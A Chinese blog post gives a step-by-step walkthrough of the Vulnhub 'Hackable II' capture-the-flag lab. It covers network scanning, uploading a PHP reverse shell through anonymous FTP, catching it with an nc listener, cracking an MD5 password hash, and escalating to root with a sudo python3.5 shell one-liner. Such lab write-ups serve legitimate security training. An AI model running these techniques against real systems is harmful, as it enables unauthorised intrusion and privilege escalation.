首页 > 其他分享 >Vulnhub之Hackable II靶机详细解题过程

Vulnhub之Hackable II靶机详细解题过程

时间:2022-11-22 13:44:06浏览次数:63  
标签:00 shrek root 192.168 II 56.207 Vulnhub Hackable data

Hackable II

作者: Jason_huawen

靶机基本信息

名称:Hackable: II

地址:https://www.vulnhub.com/entry/hackable-ii,711/

识别目标主机IP地址

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.217.0/16   |   Screen View: Unique Hosts       
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:69:61:df      1      60  PCS Systemtechnik GmbH   
 192.168.56.207  08:00:27:1d:cd:39      1      60  PCS Systemtechnik GmbH

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.207

NMAP扫描

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 00:10 EST
Nmap scan report for bogon (192.168.56.207)
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2f:c6:2f:c4:6d:a6:f5:5b:c2:1b:f9:17:1f:9a:09:89 (RSA)
|   256 5e:91:1b:6b:f1:d8:81:de:8b:2c:f3:70:61:ea:6f:29 (ECDSA)
|_  256 f1:98:21:91:c8:ee:4d:a2:83:14:64:96:37:5b:44:3d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:1D:CD:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.69 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)以及80(HTTP)

Get Access

从目标主机的FTP服务开始信息收集:

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ ftp 192.168.56.207
Connected to 192.168.56.207.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.56.207]
Name (192.168.56.207:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||48553|)
150 Opening ASCII mode data connection for file list
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 .
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 ..
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
226 Transfer complete
ftp> get CALL.html
local: CALL.html remote: CALL.html
229 Entering Extended Passive Mode (|||46279|)
150 Opening BINARY mode data connection for CALL.html (109 bytes)
100% |********************************|   109      231.40 KiB/s    00:00 ETA
226 Transfer complete
109 bytes received in 00:00 (78.67 KiB/s)
ftp> quit
221 Goodbye.

看到一个文件: CALL.html,将其下载到Kali Linux本地进行查看,文件内容本身没有太大价值。

──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ cat CALL.html 
<html>

<head>
        <title>onion</title>
</head>

<body>
        <h1>GET READY TO RECEIVE A CALL</h1>

</body>

</html>

浏览器访问80端口,返回apache默认页面,但是页面中有以下注释:

<!--
    Do you like gobuster? dirb? etc...

  -->

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.207
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/22 00:14:14 Starting gobuster in directory enumeration mode
===============================================================
/files                (Status: 301) [Size: 316] [--> http://192.168.56.207/files/]                                                                        
/server-status        (Status: 403) [Size: 279]
Progress: 217567 / 220561 (98.64%)===============================================================
2022/11/22 00:14:37 Finished
===============================================================

这个files目录里的文件就是FTP服务器中的CALL.html,那是不是意味着可以将shell.php通过FTP方式上传,然后浏览器访问该shell.php从而得到shell?

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ curl http://192.168.56.207/files/    
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /files</title>
 </head>
 <body>
<h1>Index of /files</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="CALL.html">CALL.html</a></td><td align="right">2020-11-26 13:02  </td><td align="right">109 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.207 Port 80</address>
</body></html>


──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ ftp 192.168.56.207
Connected to 192.168.56.207.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.56.207]
Name (192.168.56.207:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||11174|)
150 Opening ASCII mode data connection for file list
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 .
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 ..
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
226 Transfer complete
ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||20677|)
150 Opening BINARY mode data connection for shell.php
100% |***********************************************************************************************************************************************************************************************|  5496      121.89 MiB/s    00:00 ETA
226 Transfer complete
5496 bytes sent in 00:00 (9.16 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49299|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
-rw-r--r--   1 ftp      ftp          5496 Nov 22 05:19 shell.php
226 Transfer complete
ftp>

发现可以成功上传shell.php文件,然后看能否访问到这个php,应该在files目录下,浏览器可以成功访问:

http://192.168.56.207/files/shell.php

在Kali Linux成功得到目标主机反弹回来的shell:

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 55092
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:20:46 up 22 min,  0 users,  load average: 0.23, 1.64, 1.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$

在/home目录下有个文件:

www-data@ubuntu:~/html/files$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
important.txt  shrek
www-data@ubuntu:/home$ cat important.txt
cat important.txt
run the script to see the data

/.runme.sh
www-data@ubuntu:/home$ 



www-data@ubuntu:/home$ ls -alh /.runme.sh
ls -alh /.runme.sh
-rwxr-xr-x 1 shrek shrek 1.2K Nov 26  2020 /.runme.sh
www-data@ubuntu:/home$ cat /.runme.sh
cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
    shrek:cf4c2232354952690368f1b3dfdfb24d'
www-data@ubuntu:/home$

该脚本有个md5加密值,用MD5解密在线网站解密,解密得到:onion,应该是shrek的密码

www-data@ubuntu:/home$ su - shrek
su - shrek
Password: onion

shrek@ubuntu:~$ id
id
uid=1000(shrek) gid=1000(shrek) groups=1000(shrek)
shrek@ubuntu:~$

成功切换到了shrek用户

提权

shrek@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
shrek@ubuntu:~$

可以利用Python3.5提权,参考GTFOBINS网站给出的方法进行提权:

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo python -c 'import os; os.system("/bin/sh")'



sudo /usr/bin/python3.5 -c 'import os; os.system("/bin/sh")'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -ahl
ls -ahl
total 32K
drw-------  4 root root 4.0K Jun 15  2021 .
drwxr-xr-x 23 root root 4.0K Nov 26  2020 ..
-rw-------  1 root root   13 Jun 15  2021 .bash_history
-rw-------  1 root root 3.1K Oct 22  2015 .bashrc
drw-------  2 root root 4.0K Nov 25  2020 .cache
drw-------  2 root root 4.0K Nov 25  2020 .nano
-rw-------  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1.6K Jun 15  2021 root.txt
# cat root.txt
cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/#

成功提权,拿到root flag.

标签:00,shrek,root,192.168,II,56.207,Vulnhub,Hackable,data
From: https://www.cnblogs.com/jason-huawen/p/16914881.html

相关文章

  • Vulnhub之Gigachad靶机解题过程
    Gigachad靶机基本信息名称:Gigachad1地址:https://www.vulnhub.com/entry/gigachad-1,657/识别目标IP地址┌──(kali㉿kali)-[~/Vulnhub/Gigachad]└─$sudonetdis......
  • 16进制对应的ASCII表
      ASCII控制字符二进制十进制十六进制缩写可以显示的表示法名称/意义00000000000NUL␀空字符(Null)00000001101SOH␁标题开始00000010202STX␂本文开始00000011303E......
  • 换行、回车、空格等常用的ASCII码值
    换行符的ASCII码值为10,十六进制表示为0x0A回车符的ASCII码值为13,十六进制表示为0x0D空格符的ASCII码值为32,十六进制表示为0x20以下列出其他一些常用到的符号的ASCII码......
  • leetcode680-验证回文串 II。方法有缺陷,还需要继续琢磨
    680.验证回文串II这个做法就是利用双指针。一个指向第一个字符,一个指向最后一个字符。遇到两个指针指向的字符相同时,一个往前走,一个往后走。如果遇到不相同,那么就看看......
  • Entity Framework 6 Oracle DbConfiiguration
    EntityFramework6OracleDbConfiiguration不想配置EntityFramework6的App.Config文件时,要重写DbConfiguration,还要AppConfig当中的所有关于EntityFramework的所有配......
  • vulnhub靶场之DIGITALWORLD.LOCAL: SNAKEOIL
    准备:攻击机:虚拟机kali、本机win10。靶机:DIGITALWORLD.LOCAL:SNAKEOIL,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/digital......
  • Vulnhub之Funbox Gaokao靶机解题过程
    FunboxGaokao靶机基本信息名称:Funbox:GaoKao地址:https://www.vulnhub.com/entry/funbox-gaokao,707/提示:Don'twasteyourtime!EveryBruteForce-Attackatallp......
  • [oeasy]python0018_ ASCII_字符分布_数字_大小写字母_符号_黑暗森林
    ​ 打包和解包回忆上次内容decode 就是解码解码和编码可以转化encode编码decode解码互为逆过程大小写字母之间序号全都相差(​​32​​)​​10进......
  • IIC通信协议
    1、IIC简介IIC(Inter-IntergatedCircuit,集成电路总线)由飞利浦(Pilliphs)公司发明,是一种串行总线通信。有两根线: SDA:SerialDAta串行数据线 数据传输按bit位,属于半双工......
  • 反转字符串 II
    indexOf();查找指定字符是在字符串中的下标。在则返回所在字符串下标;不在则返回-1.Integer.parseInt();将字符串转化为int;char[]pre=s.toCharArray();intn=pre.length......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99